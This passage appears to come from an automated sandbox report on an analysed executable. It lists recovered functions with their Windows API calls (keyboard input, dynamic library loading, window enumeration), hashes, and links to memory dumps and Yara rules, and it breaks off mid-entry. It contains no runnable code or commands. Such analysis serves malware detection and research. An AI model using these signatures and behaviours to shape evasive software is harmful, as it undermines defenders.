          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Destroy$DeleteMenuObject$IconWindow
          • String ID:
          • API String ID: 752480666-0
          • Opcode ID: 24dfb10331d6de9849cdff3d0eda3e52e1f210f1413afdab55b541ad5c9a752f
          • Instruction ID: 8b6124d5070d23543196cc2b50890868113703ca153da815d3b1f0e3f97f061c
          • Opcode Fuzzy Hash: 24dfb10331d6de9849cdff3d0eda3e52e1f210f1413afdab55b541ad5c9a752f
          • Instruction Fuzzy Hash: 8A2177702042019FD72DEF28E4C8B66B7AAFF44310F14C568EA5A8B285C734E885CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118526F, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconImageList_
          • String ID:
          • API String ID: 3275902921-0
          • Opcode ID: 40b2d1d2d0665a9027280f159289e32abab6785eae4f16f6c7a5dabd7d483d68
          • Instruction ID: 488da7334316e81db027f27821ad883b534101306452e685003a87fa628d49ff
          • Opcode Fuzzy Hash: 40b2d1d2d0665a9027280f159289e32abab6785eae4f16f6c7a5dabd7d483d68
          • Instruction Fuzzy Hash: C7218B70604702AFC759EF39D4C8A56BBA6FF48314F248628F919C7284CB30E885CF51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01163187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 0116319E
          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631B9
          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631C3
          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631CB
          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D8178), ref: 011631D5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: PerformanceQuery$CounterSleep$Frequency
          • String ID:
          • API String ID: 2833360925-0
          • Opcode ID: e865d2e9f1615a07de4264a65ea567f82d187d1c554e2de8973fce35663602cb
          • Instruction ID: a2fdb7247d2103a88b86039c9787fe3748c9bcea4564a6e0d1d055dee9812d0c
          • Opcode Fuzzy Hash: e865d2e9f1615a07de4264a65ea567f82d187d1c554e2de8973fce35663602cb
          • Instruction Fuzzy Hash: DF11D33AE0011DEBCF149F99E9449EDBB78FF49722F014565EE18A3204DB319555CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118551D, Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32 ref: 0118553C
          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 01185557
          • DeleteObject.GDI32(?), ref: 011856AB
          • DeleteObject.GDI32(?), ref: 011856B9
          • DestroyIcon.USER32(?), ref: 011856C7
          • DestroyWindow.USER32(?), ref: 011856D5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DeleteDestroyMessageObjectSend$IconWindow
          • String ID:
          • API String ID: 3691411573-0
          • Opcode ID: d44c60486fee0cfa8a806e570aa4bfd206ab1ff611b8ccc1d9bd6b4da11e2b04
          • Instruction ID: 2ee6de16d9c303431b199ec0e1fb48d4fa5d44b368d418c26ce24a059425281d
          • Opcode Fuzzy Hash: d44c60486fee0cfa8a806e570aa4bfd206ab1ff611b8ccc1d9bd6b4da11e2b04
          • Instruction Fuzzy Hash: 86118271304301ABD768EF68E8C4A1677A9FB44325F108665FE14C72C4C735E8898F61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01177199, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011770BF: DeleteObject.GDI32(00000000), ref: 011770FC
            • Part of subcall function 011770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0117713C
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117714C
            • Part of subcall function 011770BF: BeginPath.GDI32(?), ref: 01177161
            • Part of subcall function 011770BF: SelectObject.GDI32(?,00000000), ref: 0117718A
          • MoveToEx.GDI32(?,?,?,00000000), ref: 011771C4
          • LineTo.GDI32(?,?,?), ref: 011771D0
          • MoveToEx.GDI32(?,?,?,00000000), ref: 011771DE
          • LineTo.GDI32(?,?,?), ref: 011771EA
          • EndPath.GDI32(?), ref: 011771FA
          • StrokePath.GDI32(?), ref: 01177208
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
          • String ID:
          • API String ID: 372113273-0
          • Opcode ID: 24d0de6695985d4be0ea5427e890c9d26312a637b9c767b7082e32d88f9d7176
          • Instruction ID: 2620eb1eac95d9f99a4357ced75b7db4a36274cb4c09944fff18b21d67dd47b5
          • Opcode Fuzzy Hash: 24d0de6695985d4be0ea5427e890c9d26312a637b9c767b7082e32d88f9d7176
          • Instruction Fuzzy Hash: 5B01D476102114BBE72A9B44EC8CFDB7B6DEF4A710F044114FA21A62C487B43585CBB5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
          Download Yara Rule
          APIs
          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0113F048
          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0113F050
          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0113F05B
          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0113F066
          • MapVirtualKeyW.USER32(00000011,00000000), ref: 0113F06E
          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0113F076
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Virtual
          • String ID:
          • API String ID: 4278518827-0
          • Opcode ID: ddb0b6e4f204f0342a2b0b95dfa5c57f717a8b57ae6f3271d544101996f779c3
          • Instruction ID: c0c7d84eea60d74ff1c0042f46c1e13f84c103bb68cd033623a250d2bba8d595
          • Opcode Fuzzy Hash: ddb0b6e4f204f0342a2b0b95dfa5c57f717a8b57ae6f3271d544101996f779c3
          • Instruction Fuzzy Hash: F0016770106B88ADD3309F668C84B43FEF8EF95704F01491DD1D507A42C6B5A84CCB69
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117B5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
          Download Yara Rule
          APIs
          • InterlockedExchange.KERNEL32(?,?), ref: 0117B5E1
          • EnterCriticalSection.KERNEL32(?), ref: 0117B5F2
          • TerminateThread.KERNEL32(?,000001F6), ref: 0117B600
          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0117B60E
            • Part of subcall function 011625E5: CloseHandle.KERNEL32(00000000,00000000,?,0117B61A,00000000,?,000003E8,?,000001F6), ref: 011625F3
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0117B623
          • LeaveCriticalSection.KERNEL32(?), ref: 0117B62A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
          • String ID:
          • API String ID: 3495660284-0
          • Opcode ID: 4458b2cc288c9f77cf50b7dcc585679fb30126792a2bde475a3cc5c201489905
          • Instruction ID: ee71e6564bfdd164a845a7b801a5f823c73f396e03e2df84fb681a54de0d7f25
          • Opcode Fuzzy Hash: 4458b2cc288c9f77cf50b7dcc585679fb30126792a2bde475a3cc5c201489905
          • Instruction Fuzzy Hash: A5F04F72541201BBD229AB64ECC8DEBB77CFF45751B400526F602D6640CB35F4A9CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011450DB, Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
          Download Yara Rule
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 011450E0
            • Part of subcall function 011477D1: TlsGetValue.KERNEL32(?,0114792A,?,011412DC,?,00000001), ref: 011477DA
            • Part of subcall function 011477D1: TlsSetValue.KERNEL32(00000000,?,011412DC,?,00000001), ref: 011477FB
          • ___fls_getvalue@4.LIBCMT ref: 011450EB
            • Part of subcall function 011477B1: TlsGetValue.KERNEL32(?,?,01143C50,00000000), ref: 011477BF
          • ___fls_setvalue@8.LIBCMT ref: 011450FD
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 01145106
          • ExitThread.KERNEL32 ref: 0114510D
          • __freefls@4.LIBCMT ref: 01145129
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
          • String ID:
          • API String ID: 442100245-0
          • Opcode ID: a7866e9466ac39634ff87fa48d237a0f6f191ea0b51adb0d8cba47da53928ad2
          • Instruction ID: 83469099f69b11add4259919d6022163190bb051a3d63ef4c74337957fbde270
          • Opcode Fuzzy Hash: a7866e9466ac39634ff87fa48d237a0f6f191ea0b51adb0d8cba47da53928ad2
          • Instruction Fuzzy Hash: 12F0A078400742AFD70CFF74C588D0E3BAAAF9CE593618454E8088726ADB34D482CAA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011783D9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Menu$Item$DrawInfoInsert
          • String ID: 0
          • API String ID: 3076010158-4108050209
          • Opcode ID: 6794d0249dddb3d3084cffb9fea2eef7fe7ea1c18fe1a3acad9f4033ba5b6d0d
          • Instruction ID: 6168b0eff234185ecf270fbf6ecea836bc0d2617fd2c072081b3534ecbd0c115
          • Opcode Fuzzy Hash: 6794d0249dddb3d3084cffb9fea2eef7fe7ea1c18fe1a3acad9f4033ba5b6d0d
          • Instruction Fuzzy Hash: 17418E75A00209DFDB28CF99E888FDAB7B5FF88314F14811DE9169B384D770A885CB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01173346, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: a31a958fa3f1dba40ba26c7e96ebde32b977c8444721446e68fee628694644cf
          • Instruction ID: 70e8e57e30637434b968368dedfb9d39230a3b56f063f8f1ada45548b44cecae
          • Opcode Fuzzy Hash: a31a958fa3f1dba40ba26c7e96ebde32b977c8444721446e68fee628694644cf
          • Instruction Fuzzy Hash: 90319371610209ABE738DF68D885BAA77A8EF44320F104649FEA1D73C0EB71D560DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01173253, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
          Download Yara Rule
          APIs
          • GetStdHandle.KERNEL32(000000F6), ref: 01173281
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Handle
          • String ID: nul
          • API String ID: 2519475695-2873401336
          • Opcode ID: de7f472ca8fd9c511438666056dc4ce0137fa7d2f10f32ad55d0b2b465cfb145
          • Instruction ID: 65888b5b0061b6af875e2b231629e621e90fc5c9d868c6b03804f42ba82a6b8d
          • Opcode Fuzzy Hash: de7f472ca8fd9c511438666056dc4ce0137fa7d2f10f32ad55d0b2b465cfb145
          • Instruction Fuzzy Hash: 82216F31610204ABE7289F6CD885BAAB7A8EF15320F108759FEB0D63C0EB719554CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118D435, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
          Download Yara Rule
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0118D446
          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0118D4BC
          • __swprintf.LIBCMT ref: 0118D4D6
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0118D51A
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorMode$InformationVolume__swprintf
          • String ID: %lu
          • API String ID: 3164766367-685833217
          • Opcode ID: 7022a2ca37acc0cbadd1e5658a8e17b3b2a626c620db30c197c61693b4ffc7ed
          • Instruction ID: 3249a67a796685a541213a2acd3442ca785dafffe68483a20c3cb0b7b1f87539
          • Opcode Fuzzy Hash: 7022a2ca37acc0cbadd1e5658a8e17b3b2a626c620db30c197c61693b4ffc7ed
          • Instruction Fuzzy Hash: 97315271A1020AAFCB18EF94D985EEEB7B4FF88304F108565E515A7354E734EE45CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011912A0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
            • Part of subcall function 01166406: SendMessageTimeoutW.USER32 ref: 01166425
            • Part of subcall function 01166406: GetWindowThreadProcessId.USER32(?,00000000), ref: 01166438
            • Part of subcall function 01166406: GetCurrentThreadId.KERNEL32 ref: 0116643F
            • Part of subcall function 01166406: AttachThreadInput.USER32(00000000), ref: 01166446
          • GetFocus.USER32 ref: 011912C7
            • Part of subcall function 01166451: GetParent.USER32(?), ref: 0116645F
            • Part of subcall function 01166451: GetParent.USER32(?), ref: 0116646B
          • GetClassNameW.USER32 ref: 01191310
          • EnumChildWindows.USER32 ref: 0119133B
          • __swprintf.LIBCMT ref: 01191354
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
          • String ID: %s%d
          • API String ID: 2645982514-1110647743
          • Opcode ID: 8d0f797155902476ecd787e6104f56398f33f0be3a7adafd94933003e1bbc1c0
          • Instruction ID: 9f92dd99e3ae6b6012ab1506eff7932911ba5f45ec12597f6d1c5ffaeba87d81
          • Opcode Fuzzy Hash: 8d0f797155902476ecd787e6104f56398f33f0be3a7adafd94933003e1bbc1c0
          • Instruction Fuzzy Hash: 0A215E7160031A6BD624AF699C84FEBB7BDAB99714F00801AF92997240DB70A955CB70
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117C2F0, Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
          Download Yara Rule
          APIs
          • GetKeyboardState.USER32(?), ref: 0117C348
          • SetKeyboardState.USER32(00000080), ref: 0117C36C
          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0117C3B0
          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0117C3E8
          • SendInput.USER32(00000001,?,0000001C), ref: 0117C475
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: KeyboardMessagePostState$InputSend
          • String ID:
          • API String ID: 3031425849-0
          • Opcode ID: 08cbb607550736917a209a693e9ec5907aa935a38d48952a95201cadd82e68f7
          • Instruction ID: 4c36dae621ce4415e9f2c2ec776ded03c4cc77d9b88f922fe4c79a6b0ca0a6c8
          • Opcode Fuzzy Hash: 08cbb607550736917a209a693e9ec5907aa935a38d48952a95201cadd82e68f7
          • Instruction Fuzzy Hash: CC416A725042496AEB28DF6DD884BFE7B7CEF56310F008156FD849A282C335D655CBE1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119444F, Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
          Download Yara Rule
          APIs
          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0119449A
          • GetProcAddress.KERNEL32(?,?), ref: 01194534
          • GetProcAddress.KERNEL32(?,00000000), ref: 01194553
          • GetProcAddress.KERNEL32(?,?), ref: 01194597
          • FreeLibrary.KERNEL32(?,?,?,?), ref: 011945B9
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressProc$Library$FreeLoad
          • String ID:
          • API String ID: 2449869053-0
          • Opcode ID: 280a781aeb9c1f4bc555d016572f068941a3070fd5a389687e9d77b86f6d2523
          • Instruction ID: 183d738e17ed95a229bda8a4a5ed51e1c23c502602378ec2d894fc126f3acbfe
          • Opcode Fuzzy Hash: 280a781aeb9c1f4bc555d016572f068941a3070fd5a389687e9d77b86f6d2523
          • Instruction Fuzzy Hash: 8C51A0756002059FDB18EFA8C980EAEB7B9FF99314F148159E915AB754C730ED42CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011AD3C9, Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
          Download Yara Rule
          APIs
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 011AD3F2
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 011AD407
          • Sleep.KERNEL32(?), ref: 011AD40F
          • InterlockedIncrement.KERNEL32(011D7F04), ref: 011AD41A
          • InterlockedDecrement.KERNEL32(011D7F04), ref: 011AD524
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID:
          • API String ID: 327565842-0
          • Opcode ID: a8bb58186cc2680eaf034cd6339859393acaf84e0079c4743e7ec6e7e1dcb0b6
          • Instruction ID: c5f8296c3ba140debeb11f4f84bb56b45066e09fc374362c616066b80aafe6c9
          • Opcode Fuzzy Hash: a8bb58186cc2680eaf034cd6339859393acaf84e0079c4743e7ec6e7e1dcb0b6
          • Instruction Fuzzy Hash: B841157560161A9BDF2EDFB8D8C4AAE7B74FB54308B404069E521E7784D730F944CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118C3AE, Relevance: 7.6, APIs: 5, Instructions: 118COMMON
          Download Yara Rule
          APIs
          • GetPrivateProfileSectionW.KERNEL32 ref: 0118C43C
          • GetPrivateProfileSectionW.KERNEL32 ref: 0118C464
          • WritePrivateProfileSectionW.KERNEL32 ref: 0118C4B0
          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0118C4D4
          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0118C4E3
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: PrivateProfile$SectionWrite$String
          • String ID:
